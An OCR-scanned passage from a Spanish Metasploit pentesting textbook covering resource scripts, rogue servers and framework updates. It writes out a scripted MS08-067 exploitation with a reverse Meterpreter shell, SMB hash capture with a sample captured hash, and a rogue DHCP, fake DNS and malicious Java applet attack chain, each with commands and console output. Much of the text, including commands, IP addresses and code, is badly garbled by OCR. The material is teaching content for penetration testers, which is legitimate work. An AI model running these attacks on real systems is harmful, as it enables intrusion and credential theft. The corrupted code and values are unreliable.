pctencial  y  flexibilidatl  que  disponen  los  resource  scripts  para  ia  automatizacidn  de  tareas  comunes. 
En  el  presente  ejemplo  se  utiliza  un  rc  para,  sunplemente,  automatizar  el  proceso  de  configuracion 
del  manejador  de  conexiones  de  los  payload,  es  decir,  exploit/multi/handler. 

echo  use  exploit/multi/handler  »  meterpreter.rc 

echo  set  PAYLOAD  windows/meterpreter/reverse_tcp  »  meterpreter.rc 

echo  set  LHOST  192.168.0.100  >>  meterpreter.rc 

echo  set  ExitOnSession  false  »  meterpreter.rc 

echo  exploit  -j  -z  >>  meterpreter.rc 

Para  lanzar  este  script  existen  distintas  maneras,  como  por  ejemplo,  en  una  Irnea  de  comandos 
ejecutar  msfconsole  ~r  meterpreter.rc ,  o  desde  una  sesion  de  msfcomole  median  te  el  com  an  do 
resource  meterpreter.  rc. 

Otro  ejemplo  interesante  e.s  la  automatizacion  de  la  explotacibn  cle  una  maquina,  por  ejemplo, 
mediante  la  explotacibn  cle  MS0S-067. 

echo  use  expioit/windows/smb/ms08_067_netapi  »  exploitNetapi  •  rc 
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echo  set  PAYLOAD  windows/meterpreter/reverse  top  »  exploitNetaui  ro 
echo  set  RHOST  192. 168.0. HO  »  exploitMetapi'  rc  P  P 

echo  set  LHOST  192.168.0.100  »  exploitNetapi .'  rc 
echo  exploit  -j  -z  »  exploitNetapi.ro 

Mi  >  resource  exploitNetapi .  rc - - — _ _____ _ 

I 

PAYLOAD  =>  windows/meterpreter/reverse  tcp  | 

LHOST ^  {g2^68^ffl5g0rk3/®Sf3ySCriptS''resource'/exPloi,-Netapi.rc}>  set  LHOST  182. 168.0. 56  | 

RHOSt'2  I92^8ofl^g0rk3/<BSf3/SCriPtS/re50UrCe/eXpl0itNetapi  ' C)>  set  "HOST  1^.108.0.59 

explait  ‘i  Z 

(*1  Started  reverse  handler  on  192.168.0.56-4444 

|  Selected  Target;  Windows  XP  SP3  Spanish  (NX) 

J  Attempting  to  trigger  the  vulnerability 

*  Sending  stage  (752128  bytes)  to  192-.168.’b!s9 

...40288  ^  6ter  SeSS1°n  1  Dpefleci  (192-168.0.56:4444  ->  192.168.0.59:1871)  at  2012-06-25  00: 18:56 


Fig  3.30:  Ejection  de  un  r esourc 


•e  script  para  MS08-067. 


6.  Servidores  Rogue 


t tT,Pl0i‘  lliSp0f  de  lm0S  m6dul0S  de  liP°  auxi,ia'y  "™y  interesanles  que  permiten  ai  auditor 

de  el  tITI  I6"  men°? dC  U"  minUl0’ d  CUal  ofrece  un  savkio  totalme"‘e  also.  El  objetivo 
po  de  semdoies  es  la  captura  de  credencrales  o  ejecucion  de  codigo  arbitrario  mediante 

S  ;  ™ra  re”0to-  (LoS  engafios  ir  desde  simples 

J"  1  d  d  "  PUert0  Concreto  esl,era  el  servicio  raalicioso,  hasta  un  complete 

d"  ir^fnrd^Ta^Tc^r^'60*"^  ‘'ea’iZan '°  debeHan  termi‘’ar  COn  Ia 

nLird6l,d,e  ”  alT  en  af,amework  este  lipo  de  modulos  es  auxiliary/serverl  En  esta  ruta  se 
puecle  encoutrar  un  directono  capture  donde  se  almacenan  modulos  cuyo  objetivo  principal  es  la 
aptura  de  credencales  y,  otros  element  de  interes  oomo  las  cookies.  A  con  inuaci”  ,  In 
inlormacion  sobre  los  modulos  server/cupture. 


Mtklulo  auxiliary 

Description  ] 

server/capture/smb 

Permite  configurar  un  servidor  para  protocolo  S'MB  con  el  que  se  pueden . 
obtener  hashes  de  tipo  NTLM 

server/capture/ftp 

u"  servidor  l?TP  presenle  un  login  pare  recoger 

Capiiul o  III.  El  arte  de  la  intrusion 


Description 

Permits  configurer  un  servidor  HTTP  para  capturar  credenciales  de 
autenticacion 

Permite  configurer  un  servicio  POP3  (also  para  capturar  credenciales 

Permite  configurar  un  servicio  SMTP  para  capturar  credcnciaies  de 
autenticacion  _  . _ 

Permite  configurar  tin  servidor  de  telnet  para  realizar  el  engaiio  y  obtener 
las  credenciales 

Tabla  3.04:  MtWulos  auxiliary/server/capiure. 

msf  auxilisrytsmin  >  seta  SRVHOST  192.168.1.35  * 

SRVHOST  «>  192,168.1.35 

msf  auxiliary (smb)  ?  set  LOGFILE  /root/hashes. txt 

LOGFILE  =>  /root/hashes. txt 

msf  auxiliary (smb)  >  run 

(*}  Auxiliary  module  execution  completed 

(*]  Server  started. 

msf  aux.iliary(SKib)  >  [+]  2012-06-26  22:04:10  +8200 
NTLHV2  Response  Captured  from  192.168.1.36:51774 
8IT-PC\ftsai  OS:  LM: 

LHHASH: Disabled  IM  CLIENT  CHALLENGE: Disabled 

NTHASH:e32375el52f’618170128a917bee6efe4  NT_CLIENT_CHALLENGE:0161000080000000360cc6d7d653cdG16c7f 
e3  f935fdfe3 196000000029808006986066060009009 _ _ _ _ _ _ 

Fig  3.31 :  Captura  de  hashes  con  auxiliary/server/capture/smb. 

Existe  la  posibilidad  de  descargarse  mas  exploits  que  proporcionan  func tonal idades  similaies  con 
otros  servicios.  Es  muy  interesante  disponer  a  mano  de  este  tipo  de  herramientas. 

Las  otras  herramientas  interesantes  son  las  auxiliary/server  donde  se  dispone  de  distinlas 
funcionai iclades  que,  ya  sea  en  solitario  o  unidas,  pueden  provocar  gran  terror  en  la  reel. 

PoC:  Rogue  DHCP,  Fake  DNS  y  Applet  de  Java 

En  el  siguiente  ejempio  se  va  a  realizar  una  prueba  de  concepto  con  aiixiliary/server/dhcp ,  con  el 
que  se  configurara  im  Rogue  DHCP,  auxiliary/ server! fakedns^  con  e!  que  se  configuraia  un  DNS  un 
tanto  especial  y  exploit/multi/browser/java_signed_applel  con  el  que  se  realizaiti  la  explolacion  de 
la  maquina  de  la  vlctima. 

El  escenario  esta  compuesto  por  una  red,  que  podrla  ser  una  red  wireless  o  una  ted  coipoiativa 
cableada,  donde  el  atacante  configurara  un  rogue  DHCP  con  el  que  se  buscaia  que  los  cl  i  elites 
obtengan  una  direccion  IP  de  un  rango  concreto,  una  direction  IP  de  un  servidor  DNS  conti  olado  pot 
el  atacante  y  una  direccion  de  puerta  de  enlace,  que  tambien  podrla  ser  la  direccion  IP  del  atacante 
por  lo  que  se  podrla  monitorizar  el  trafico  para  obtener  cookies  o  credenciales. 


Modulo  auxiliary 
server/caplure/hHp 


server/cap  tare/ 
pop! 

server/eapturc/ 

smtp 


server/capture./ 

telnet 


- !_ -  Metasploii  para  Pen  testers 

Ademas  sc  configure  un  servicio  web  donde  al  reafizar  la  conexion  se  lanzarf  un  applet  de  java 
con  intenciones  maliciosas.  Esfe  servicio  sera  referenciado  por  una  pigina  web  que  siraulara  un 
portal  caul, VO  y  que  realmente  redirigira  al  servicio  web  donde  se  lanzart  el  applet  mHickro 
i  11  Pf*"“ se  sncuentra  aiojada  en  un  servidor  Apache  que  escucha  peticiones  en  el  puerto  80,  a! 
•egar  a  peticion  se  muestra  la  pagina  del  portal  cautivo  que  poco  despues  redirigira  a  la  direccidn 
URL  donue  se  encuentra  configurado  el  servicio  del  applet.  Cuando  e!  usuano  o  victims  accptc  la 
ejecucioi'  del  applet,  realmente  se  ester*  ejecutando  un  payload  devolveri  una  sesion  invcrsa. 
en  este  case  un  melerpreter. 

La  conliguracion  del  Rogue  DHCP  es  bastante  sencilla,  se  carga  el  modulo  auxilia, y/senm'Jhen  y 
se  configurnn  algimos  paramelros  eorao  se  puede  visual izar  en  la  signienle  tabla. 


Para  metro 

- - — - -  - 

Valor  l 

DHCPIPEND 

192.168.0.105  . “j 

DllCPiP, START 

192.168.0.100  i 

-  1 

! 

DNSSERVER 

La  direccidn  IP  donde  se  encuentra  el  DNS,  por  ejeiripio,  maquina  del 
atacante.  1 92. 168.0.61  -  . 

NETMASK 

255.255.255.0  “  ’ 

ROUTER 

La  direccidn  IP  de  la  puerta  de  enlace,  podrfa  ser  la  maquina  del  atacante  para 
monitorlzar  trdfico.  192.168.0.61 

SRVIIOST 

La  direccidn  IP  donde  se  lanza  el  Rogue  DHCP.  1 92. 1 68.0.6  i  ' 

!1£1  >  use  auxiliary/server/dhcp  ~ 
iijst  auxilia ry ( tlhcp }  >  show  options 

Module  options  (auxiliary/server/dhcp): 

Name  Current  Setting  Required  Description 


BROADCAST 
DHCPIPEND 
DHCPIPSTART 
ONSSERVER 
FILENAME 
server 
HOSTNAME 
I  HOSTSTART 
j  NETMASK 
I  ROUTER 
SRVIIOST 


The  broadcast  address  to  send  to 
The  last  IP  to  give  out 
The  first  IP  to  give  out  • 

The  DNS  server  IP  address 

The  optional  filename  of  a  tftp  boot 

The  optional  hostname  to  assign 
The  optional  host  integer  counter 
The  netmask  of  the  local  subnet 
The  router  IP  address 
The  IP  of  the  DHCP  server 


isf  auxiliary (ilhep)  >  set  DHCPIPEND  192.168.0  105 

DHCPIPEND  =>  1-92.168.0.105 

15  f  auxilia  ry(dhcp)  >  _ • 

Fig  3.32:  Conliguracion  Rogue  DHCP 
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Podrfa  ser  interesante  a-gotar  las  direeciones  IP  disponibles  en  el  pool  del  DHCP  original  que  existe 
en  !a  misma  red,  si  existiese  alguno.  Llegado  este  punto,  !os  clientes  que  se  conecten  a  la  red  recibiran 
direeciones  IP  otorgadas  por  el  servidor  DHCP  false,  ademas  de  lo  mas  interesante,  la  direccidn  IP 
del  servidor  DNS  y  de  la  puerta  cle  enlace  que  se  quiera. 

Es  ei  memento  de  configurar  el  servidor  DNS  fatso,  para  ello  se  carga  el  modulo  aitxiliary/server/ 
fitkedns.  El  funcionamiento  ckfakedns  es  sencillo,  con  la  variable  DOMAINBYPASS  se  configura 
una  lista  cle  dominios  para  los  que  las  resoluciones  no  serin  lalseadas,  SRVHOST  es  la  variable 
donde  se  configura  la  direccidn  IP  donde  se  raonta  el  servidor  DNS  fatso,  la  del  atacante  en  este 
caso,  Tras  lanzar  el  modulo,  en  el  ejemplo,  cuando  la  victima  pida  resolver  cualquier  nombre  de 
dominio,  excepto  Google  porque  asi  esta  configurado,  se  resolvera  con  la  direccidn  IP  del  atacante 
donde  espera  el  servidor  Apache. 

msf  auxiliary (dhep !  >  run 

l*]  Auxiliary  module  execution  completed 

(*]  Starting  DHCP  server,.. 

msf  auxiUary(dhcp)  >  use  nuxiliary/server/fakedns 
msf  auxiliary (fnketlns)  >  show  options 

Module  options  (aiixiliary/server/fakedns) : 


Name 

Current  Setting 

Required 

Description 

DOMAINBYPASS 

www.google.com 

yes 

The  list  of  domain  names  we  want  to  fully  resolve 

SRVHOST 

0. 0.0.0 

yes 

The  local  host  to  listen  on. 

SRVP0RT 

53 

yes 

The  local  port  to  listen  on. 

TARGCTHOST 

no 

The  address  that  all  names  should  resolve  to 

msf  auxilia ry(fakedns)  >  set  SRVHOST  102  -  IRQ .0.61 
SRVHOST  =>  1M.  168.6.61 
msf  auxiliaryffakadns)  >  run 
I*)  Auxiliary  module  execution  completed 

{♦!  DNS  server  initializing 

H  DNS  server  started  _ _ _ 

Fig  3.33:  Configurttci6n  d e  fakedns. 

Una  de  las  vtctimas,  la  eual  obtuvo  las  direeciones  IP  por  el  DI-ICP  false,  realiza  una  peticion  a  www. 
apple.com.  E!  servidor  DNS  falso  resuelve  esta  peticion  devolviendo  la  direccidn  IP  de  la  maquina 
del  atacante,  192.168.0.6 1 .  La  maquina  de  la  victima,  realiza  la  peticion  al  atacante  al  puerto  80, 
donde  se  encuentra  un  archivo  index. ht mi  con  el  siguiente  eddigo: 

< ! DOC TYPE  HTML  PUBLIC  "-//W3C//DTD  HTML  3.2//EN"> 

<HTML> 

<HEAD> 

<T IT LE> Captive  Portal</TITLE> 

</HEAD> 

<BODY> 

Captive  PortaJCbr  /> 

<script  type="text/javascript">window. location  =  "http: //www. apple. com: 8080/ 
portal"  </scripr.>  <! —  Arbitrary  Redirect  — > 

</BODY> 

</HTML> 


Metasploit  para  Pentesters 


M,lo  del  g^fa  de  java  se  cortgum  con  to,  ualores  qt,e  se  especificm,  e„  la  siguiente  labia. 

Pai&inctro  ,  - - — - — - 

_ _ _ _ _ _ ■  Valor 

SRVHQST  192. 168.06^1?  atacante)  "  ' - - - 

SRVPQRT  8080  (puerto  escucha  servicio)  ~ - 

UR1PATH  ~/p^hd  "  - - - — - - 

I  PAYLOAD  Windo ws/meterpreter/reverse  ten  - - 

Tahla  3.06:  Conligmacion  modulo  applet  dc  java.  '  - ~ - 

^  “"'I28*'  dire“  d  ^  pero 

- Sr aaa -r  -*■  -  - 

S  - ~n 

nodule  options  (exploit/»ulU/browser/ja,a_signed.applet)i 
Nme  Current  Setting  Required  Description 


APPLETNAHE  SiteLoader  yes 

CERTCN  Metasploit  Inc.  yes 

SRVH05T  0.0, 0.8  yes 

n  the  local  machine  or  0.0.0  e 
SRVPORT  8080  ves 

SSL  false  ,,o 

SSLVersion  SSL3  no 

ed:  SSL2 ,  SSL3,  TLS1) 

URIPATH 


The  main  applet's  class  name. 

The  CN=  value  for  the  certificate. 

The  local  host  to  listen  on.  This  must  be  an  address  o 

The  local  port  to  listen  on. 

Negotiate  SSL  for  incoming  connections 

Specify  the  version  of  SSL  that  should  be  used  {accept 


L— - - - - - no  The  UR!  to  use  for  this  exploit  (default  is  random)  j 

Fig  3.34:  Conligtiracidn  exploit/multi/browser/jum  signed  applet  “ - 


[*]  Building  statically  signed  jar  for  192.168.8.183 

[*]  Sending  SiteLoader. jar  to  192.168.0.103:1368.  Waiting  for  user  to  click  ’accept'... 

[+]  sending  staoe  (749056  bytes)  to  192.168.0.163 

(*}  Meterpretersession  1  opened  (192.168.0.61:4444  ->  192.168.0.103:1370)  at  2012-06-25  18:41:4 
3  +S208 

asf  exploit! java^signetl  applet)  >  sessions  -l 
active  sessions 


Id  Type  Information  Connection 


1  Interpreter  x86/win32  192.168.9.61:4444  ->  192.168.0.103:13/0 

Fig  3.36:  Obienciou  sesion  in  versa  tie!  applet. 


Fake  DNS  por  Jose  Selvi 

Jose  Selvi  es  uno  tie  los  grandes  especial  istas  en  pentesting  a  nivel  national,  mentor  tie  hidden! 
Handling  y  Penetration  Testing  del  SANS  Institute  en  Espana.  El  escribe  sus  granites  conocimientos 
en  su  blog  Pentester.es ,  el  dial  se  recomienda  su  lectura  descle  esle  libro. 

FakeDNS  ha  siclo  muy  utilizado  por  Jose  en  sus  auditorias  y  propuso  una  mejora  a  esie  modulo, 
la  cual  realmcnte  se  ve  reflejada  en  2  aspeetbs,  la  logica  y  su  eficiencia.  Jose  se  ha  declarado  un 
enamorado  de  Metasploit,  debido  a  su  ilexibilidad  y  potential.  FakeDNS  se  encuenlra  en  la  ruta  / 
pentest/exploils/frameworkj/modules/auxiliary/server/fakedns.rb. 

En  la  prueba  de  concepto  anterior  se  ha  podido  estudiar  como  Fake  DNS  uliliza  una  logica  inversa 
a  lo  comun,  es  decir,  se  resuelven  todos  los  nombres  de  dominio  tie  manera  falsa,  ex  cep  to  una  iista 
que  se  indica.  Es  por  esto  que  Jose  planted  una  nueva  solution  al  modulo,  lo  iogico  seria  ulilizar 
el  modulo  fake  DNS  para  que  resolviera  todo  correctamente,  como  harla  un  DNS,  y  que  el  auditor 
eligiese  que  dominio  se  spoof ea. 

En  su  artleulo  http://www.pentester.es/2012/03/mejorandofcikedns-i.hlml,  Jose  habla  de  como 
funciona  FakeDNS  y  como  el  ha  mejorado  este  modulo.  El  codigo  original  se  puecle  visualizar  a 
continuation. 

jf  Identify  potential  domain  exceptions 
@domain_bypass_list.each  do  |ex| 

if  (name.to_s  <=>  ex)  ==  0 

#  Resolve  the  exception  domain 
ip  =  Resoiv: : DNS. new () .getaddress (name) .to_s 
answer  =  Resolv: :DNS: : Resource: : IN: :A.new{  ip  ) 
if  (Glog_console) 

print_status ("DNS  bypass  domain  found:  #(exj") 
print_status ("DNS  bypass  domain  #(ex)  resolved  (Kip)") 

end 

end 

end 

request. add_answer (name,  6G,  answer) 


Rn  el  codigo  exisle  im  punto  en  que  se  recorre  la  list*  de  dominies  quo  deben  ser  saitados  a  la  horn  de 
a  sea:  a  lespuesta  NS^Mediante  el  bucle  que  se  ve  en  el  codigo  se  compare  la  petition  DNS  con 
os  reentos  de  la  „sta  DOMAINBYPASS,  si  alguno  son  iguales  entonces  se  realize  una  resolution 

mis' !  ■  7  q“e  81  T°'m  13  ‘iSta  y  C°mparar  los  elcmentos  1,0  se  ha  CTcontrado  ninguno 
jgual  se  envia  la  respuesta fake.  b 

Si  se  requiere  cambiar  el  comportamiento  del  DNS  se  podrla  pensar  en  una  solution  rapids  como  es 
inoililicar  el  primer  <f  por  la  siguiente  lines  if  (mme.loj  <=>  ex)  /-  ft  Con  esta  solucion,  cuamln 

nlrm- 1  SdiS°  'C  d°  TT'’""'6  ”  'iSta  Se  resolver4  V  cuando  no  lo  este  fundonani 

maf.  Solo  bene  una  Imutacion  y  es  que  en  ia  variable  DOMAINBYPASS  solo  se  podra  con  Imurar 
iin  nombre  tie  dominio,  y  no  mas.  ' 

U  solucion  anterior  puede  ayudar  en  un  momenta  dado  de  una  auditor!*,  pero  cuando  se  le  introduce 

no  e  st^  i  m6dui° deja  *  rmciu"afy se  ^  ** 

«;“lr  U"  COntrol  <le  eXCePCi°nra  en  h  de  -  Mue  se  realize  e, 

begin 

ip  -  Resolv : : DNS . new ( ) . getaddress (name) . to  s 
answer  =  Resolv: :DNS: : Resource: : IN: rA.newf  ip  ) 
rescue  :: Exception  =>  e 
next 
end 

e^LdehnItataTeeme,,tedp0  *  T  CUand°  *  inte"te  *  “  * *>mmio  que  no 

es  fundomd  ’ SegU"  J°®'  Sig“e  Siend°  "™  «*■*■  “ "  ta-'o  especial,  aunque  si 

fXdns'm  C0"  T  S0'UCWn  e!er?a,nte  y  efidente' Jos6  SelVi  imp,enrent6  "  (*«pia  version  de 
r/.eDN.S  a  la  que  denom.no  tefittJNS,  la  cual  se  puede  descargar  desde  el  siguiente  enlace 

Esta  Versi6n  est4  basada  «  la  original  del  framework,  pero  sc  ban 
anadido  I imciona  lidades  mteresantes:  ^ 

-  La  variable  TARGETACTfON  con  la  que  se  evita  modificar  a  mano  el  codigo  y  permits 

BYPASS0",  n«r  T8inai  la  '68iCa ,,IOdificada'  Este  pararaetro  se  r«“te  definir  como 
I™' e  DNS  resolvera  lodo  excePto  lo  9*  »  q»«a  spofea,-  6  FAKE,  el  cual  falseare 
todus  las  peticiones  menos  las  espeeiftcadas  en  la  lista  DOMAINBYPASS. 

clondl'o1  ^  err°'T  Cl  CUa'  CVita  q“e apiiCaCi6"  °ai8a  an,c  ia  !**««"  *  »  nombre  de 
tiommio  que  no  existe. 

morta  WPASq 16  q“e  ^  Vari°S  norabres  de  dominio  e"  la  'iste.  Mo  en 

motlo  BYPASS  como  en  mode  FAKE. 

*.in“a64SeeomUede  ***  *  “  °"  ■» 


7.  Personalizacion  y  actualizacion  del  framework 

Una  caracteristica  interesante  de  Metasploit  es  la  flexibilidad  y  facilidad  de  actualizacion  del 
framework.  Los  usuarios  saben  que  la  seguridad  informatica  es  una  de  las  ramas  que  mas  avanza, 
ya  que  practicamente  a  diario  salen  gran  eantidad  de  vulnerabilidades  conocidas.  Es  por  esto\jue 
el  auditor  debe  disponer  de  su  framework  lo  mas  actual  izado  posible  y  al  dla,  para  que  en  los  test 
tie  intrusion  que  liaga  uso  de  Metasploit  este  pueda  sacar  el  maxirno  provecho  de  los  sistemas 
inform 4ti cos  a  los  que  se  enfrenta. 

Metasploit  proporciona  un  rnecanismo  de  actualizacion  automatico  mediante  el  uso  del  comando 
tref update.  Este  rnecanismo  eoneeta  con  los  servidores  de  Metasploit  a  traves  de  la  URL  https:// 
metasploit. com  y  sc  reai iza  una  consulta  del  estado  de  la  base  de  datos  local,  veri  ficando  en  que  estado 
se  encuentra  y  si  existen  nuevos  exploits ,  payloads,  encoders ,  etcetera.  Si  exjsten  actualizaciones  se 
precede  a  la  descarga  de  todas  el  las,  este  proceso  puede  consiimir  gran  eantidad  de  tiempo. 


1*1  Attempting  to  update  the  Metasploit  Framework... 

m 

-  Hostname:  metasploit.com 

Valid:  from  tue,  16  Mar  2610  12:69:59  GMT  until  Mon,  01  Apr  2013  22:02:24  GMT 

-  Issuer:  07969287,  http://cert.iticates.fjodaddy.com/repository,  GoOaddy.com,  Inc.,  Scottsdale, 

Arizona,  US 

-  Fingerprint:  da:lfi;ad:cb:4c:6f :7d:ct;b7:7e:5e;e5:f9:a7:al:Bb:3a:B2:6a:92 

(R) eject ,  accept  (tjemporarily  or  accept  (p)ermaneiitly?  p 
A  external/sout ce/j avapayload/src/metasploit/RHIPayload . java 

A  extern? l/source/javapayload/src/mctasploit/AESEncryption. java 

A  external/stiurce/javapayload/src/metasploit/PayloadTrustManager.  java 
U  externa l/source/javapayload/src/metasploit/Pay load. java 

A  external/softrce/  javapayload/src/metasploit/RMILoader.  j  ava 
A  external/ source/ javapayload/sre/rmi 

A  external/source/javapayload/src/rmi/RMICaptureServer. java _ 

Fig  3.37:  Aclualizncion  aulomfitka  con  msfupdale, 

Como  se  ha  mencionado  anteriormeute  en  este  libro,  existe  un  gran  problema  con  las  actualizaciones 
automaticas  y  es  que  se  pierde  el  control  sobre  lo  que  se  esta  realtzando  en  el  framework .  Por 
ejemplo,  si  actualmente  se  actualiza  Metasploit,  en  su  version  libre,  se  perdera  la  ftincionalidad 
autopwn  y  no  podra  ser  utilizada  por  el  auditor  en  el  test  de  intrusion.  Es  por  esto,  que  en  muchas 
ocasion.es  se  recomienda  el  uso  de  la  actualizacion  manual  y  de  manera  controlada.  Ademas,  en  el 
proceso  de  actualizacion  tambien  se  descargan  archivos  para  mejorar  la  estabilidad  del  framework. 


Actualizacion  controlada  de  recursos 

Anadir  exploits  u  otras  funcionalidades  a  Metasploit  es  realmente  sencilio  si  se  conoce  su  estractura. 
Como  se  ha  mencionado  anteriormente  en  el  libro,  Metasploit  dispone  de  una  serie  de  directories 
organizados  donde  se  recogen  los  exploits,  encoders,  payloads,  herramientas  auxiliares  como  pueden 
ser  los  escaneres,  etcetera.  Para  ahadir  un  exploit  que  se  haya  descargado  de  Internet,  simplemente 
hay  que  anadir  el  fichero  eon  extension  rb,  Ruby,  en  la  catpeta  exploit  que  se  encuentra  en  la  ruta/ 
pentest/exploits/framework3/modides.  Como  nota  anadir,  que  los  exploits  que  se  descarguen  deben 
estar  escritos  para  Metasploit. 


UiU _ _ _ _ _  Metasploit  para  Pen  testers 

Una  vez  se  clisponga  de  esto  claro,  el  auditor  puede  personalizar  su  entorno  y  sus  rutas  donde 
encontrar  sus  exploits  a  su  antojo.  Por  ejemplo,  si  el  auditor  quiere  una  carpeta  denominada 
MisExploils  que  contenga  todos  los  exploits  que  el  requiera,  una  buena  practica  serla  crear  esta 
carpeta  en  la  ruta  /pentest/exptoils/frameworkJ/inodules/exploits,  de  esta  manera  cuando  el  auditor 
quiera  acceder  desde  msfconsole  al  contenido  de  ese  directorio,  simplemente  debera  ejecutar  use 
exploit/Mis Exploits  y  elegir  el  fichero  que  se  requiera  cargar  o  utilizar. 

Para  el  resio  de  components  y  modulos  este  proceso  es  similar  y  puede  scr  llevado  a  eabo  de 
manera  analoga. 


Ejemplo:  Descarga  de  exploit  y  adicion  al  framework 

Para  el  siguiente  ejemplo  se  descargara  tin  exploit  del  sitio  web  http://exploit-db.com ,  que  se 
encuentie  eseiito  en  Ruby  y  preparado  para  Metasploit.  Despues,  se  copiara  el  exploit  a  la  carpeta 
donde  se  quiera  dejar  6s te  y  poder  cargarlo  eon  el  framework. 

En  primer  lugar  se  accede  al  sitio  web  y  se  busca  el  exploit  requerido,  se  puede  hacer  uso  del  buscador 
que  viene  incoipoiado  en  el  sitio  a  traves  de  su  URL  http://www.exploit-clb.com/search.  Una  vez  se 
local  ice  el  exploit  tequerido  para  lievar  a  cabo  ei  proceso  de  explotacion  se  debe  descargar  a!  equipo, 
en  ptincipio  sobre  cualquier  ruta.  Hay  que  tener  en  cuenta  que  el  exploit  esta  preparado  para  ser 
ulilizado  por  ei  framework. 


D  Hi*  Player  AVM  Vt  x 

C?  j  Q  www.exploit-db.com/exploits/19295/ 


[  Author.  metasploit  Published;  2012-06-20  Verified:  V’1 


. .  1UUU“BU-  Yenned:  v  K.img 

■■  ■&.;  .  &  &  5*  *  eVOvetjt  (0.0) 

Exploit  Code:  gj  Vulnerable  App:  N/A  | 

1  ,  v  'sj-v.v 


a . ants 


U  This  file  is  part  of  the  Metasploit  Framework  and  may  be  subject  to 
fl  redistribution  and  commercial  restrictions.  Please  see  the  Metasploit 
9  web  site  for  more  Information  on  licensing  and  terms  of  use. 

Jt  http://metaspioit.com/ 
it  it 

require  ‘rasf/co re' 

class  Metasploit3  <  Msf: : Exploit :: Remote 
Rank  *  GreatRanking 

include  Msf:; Exploit: :Reroote: :HttpServen: :HTHL 

def  ifiitialize(info  -  {}) 
super  (update_info(irrfo, 

'Description*  ’>  %^°be  flash  Player  AVM  Verification  Logic  Array  Indexing  Code  Execution', 
_ _ This  module  exploits  a  vulnerability  in  Adobe  Flash  Player  versions  1R. 3. 131. 23 


Una  vez  que  se  dispone  del  fichero  con  extension  rb,  se  debe  alojar  en  una  ruta  que  cuelgue  de  la 
ralz  de  los  exploits,  es  decir,  la  ruta  /pentest/exploits/framework3/modules/exploits.  En  esta  ruta 
se  pueden  crear  otros  directories  o  alojar  el  exploit  en  alguna  ya  existente.  ’Para  este  ejemplo  se 
creara  una  nueva  carpeta  en  la  ruta  comentada  anteriormente  cuyo  nombre  sera  MiExploit.  Tras  la 
descarga  del  exploit  se  ha  denominado  JlashArtelntrusion.rb  al  fichero  que  lo  contiene.  Este  fichero 
debera  ser  copiado  o  movido  a  la  ruta  /pentesl/exploits/framework3/modules/exploits/MiExploit, 
recientemenle  creada. 

rootgbtTTexplnTts#  cp  flashArteintrusion.fb  /peRtest/exploits/fraffiewark3/Bodul¥s7e):j)lc"its/tii"Sp' 
loll/ 

root@t»t r-'/nxploi ts#  cd  /pentest/exploits/fraieworkS/fflodules/exploits/HiExplolt/ 
root@bt : /['••nirsf't-iploits/frniMiworkS/sodtiles/expUits/MiExptoit#  Is 

flashArtslntnjsion.  rb 

rcatgbt :  /pgni  cf,t./fi>:tiLults/fi'arsEMi>rk3/Bodi)lfis/ax|)lnits/aiExplqif<l  | 

Fig  3.39:  Adicion  de  un  exploit  a  una  ruta  de  Metasploit. 

Una  vez  que  se  dispone  de  los  nuevos  exploits  en  las  rutas,  y  estos  esten  preparados  se  debe  arrancar 
cl. framework  para  poder  inleractuar  eon  ellos.  Tras  ianzar  msfconsole  se  utiliza  ei  eomando  use  para 
cargar  el  modulo  ulilizando  la  ruta  donde  se  aioja  jlashArtelntnision.rb.  Como  se  puede  observin' 
en  la  siguiente  imaged  es  bastante  sencilio  e  intuitivo  la  adicion  de  exploits  y  su  organizacion  en  el 
framework ,  mediante  ei  uso  de  directorios. 

msf  >  use  exoloit/HiExploit/flashArtelntnision 
msf  exploit tflashArtfilntrusion)  >  show  options 

Module  options  (exploit/MlExploit/flashArtelntrusion) : 

Fig  3.40:  Acceso  til  exploit  anadido  al  framework. 


Capitulo  IV.  Meterpreter  &  Post-Exploialion 


1.  Ambito 

El  presente  capitulo  sc  centra  eri  el  ambito  de  la  post-explotacion  una  cie  las  fases  mas  delicacies  del 
test  de  intrusion.  En  esta  fase  el  auditor  puede  obtener  gran  cantidad  de  informacion  sobre  el  estado 
de  una  red,  de  una  maquina  o  inciuso,  poder  obtener  acceso  a  zonas  donde  antes  no  se  podia  acceder., 

En  muchas  ocasiones  se  quiere  llegar  a  zonas  de  la  red  desde  las  que  un  auditor,  en  el  estado  actual^ 
no  puede  lograr  acceso.  Pero  si  es  cierto  que  el  auditor  puede  demostrar  a  la  orgariizacion  que  esta 
siendo  auditada,  que  tener  tin  mal  cliseno  de  red,  o  no  delimiter  correctamente  ios  accesos  a  zonas 
de  la  red  sensibles,  pueden  provocar  accesos  no  autorizados.  En  muchas  ocasiones  estos  accesosi 
no  se  realizan  directaniente  desde  la  maquina  que  dispone  el  auditor,  y  si  a  traves  de  maquinas  con 
menor  peso  en  la  organjzacion,  las  cuales  proporeionan  conectividad  con  zonas  mas  sensibles  de 
la  red.  Inciuso,  puede  que  las  maquinas  comentadas  anteriormente  compartan  credenciates  con  las 
maquinas  mas  importantes,  un  grave  error  de  seguridad  que  sin  ciuda  el  auditor  pocira  aprovechar 
para  im  personal  izar. 

La  post-explotacion  es  por  tanto  una  de  las  fases  comprendidas  en  un  test  de  intrusion  y  la  dual  clebe 
ser  procesada  de  manera  minuciosa.  En  esta  fase  e!  auditor  recopilara  informacion  real  del  escenario, 
utilizando  como  intermediario  una  maquina  vulnerada  en  la  fase  anterior,  la  fase  de  explotacion. 

En  diclia  fase  se  indicaba  que  1a.  eleccion  del  payload  es  una  accion  eritica  ya  que  las  funcionalidades 
q  ue  se  podrian  real  izar  despues  de  lograr  la  explotacion  dependian  cie  este.  En  algunas  ocasiones  no 
se  necesitan  muchas,  funcionalidades  y  si  una  en  concreto.  Mientras  que  en  otras  ocasiones  lograr 
tener  un  control  completo  sobre  la  maquina  vtctima  puede  ayudar,  y  mucbo,  en  ia  fase  de  post- 
explotacion. 

Cuando  se  dispone  de  acceso  fisico  a  una  maquina,  uno  de  los  payload  mas  interesantes  que  se 
puede  ejeeutar  es  algimo  que  proporcione  una  escalada  de  privilegios  en  la  misma.  No  es  necesario 
montar  un  Meterpreter,  el  cual  se  estudiara  mas  adelante,  para  simplemente  elevar  privilegios. 

Tambien  hay  que  recalcar  que  en  muchas  otras  ocasiones  se  necesita  de  payloads  como  Meterpreter 
para  poder  disponer  de  un  control  total  sobre  la  maquina  victima.  Pero  no  solo  un  control  total  sobre 
la  maquina  vulnerada,  si.no  aprovechar  esta  situacion  para  controlar  el  entorno  de  dicho  equipo. 
